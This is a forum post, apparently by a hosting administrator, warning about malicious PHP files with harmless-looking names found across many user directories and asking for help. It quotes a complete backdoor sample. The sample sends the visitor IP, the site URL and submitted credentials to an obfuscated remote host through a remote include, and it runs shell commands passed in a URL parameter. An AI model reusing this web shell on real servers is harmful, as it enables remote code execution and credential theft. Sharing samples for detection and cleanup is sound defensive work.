New Vulnerabilities - Scary PHP Files ALL Over the Server

Not sure if any of you may have fallen to the same issues yet, but I'd recommend you do a "locate" or find of some files...here's some examples:

options.php
layout.php
configs.php
base.php
time.php
date.php
tests.php
fsav.php

There's plenty more out there. These files all contain some dirty code...here's an example:

Code: 
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_en
code($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
Not sure exactly what this does, but...

These files will INFEST your server. I have found them in almost EVERY user directory; meaning only safe_mode or suPHP could have stopped it. Cleaning them out is so difficult!

I think this problem is related to Gallery. About 10 of my clients reported broken Gallery templates today and then this happened. However, Wordpress templates were also broken, and phpBBfm templates; they are broken on their own.

It seems that the last two weeks has seen a HUGE jump in vulnerabilities...

Anyone else seeing this? Any ideas? Please?

 

 

 

 

Top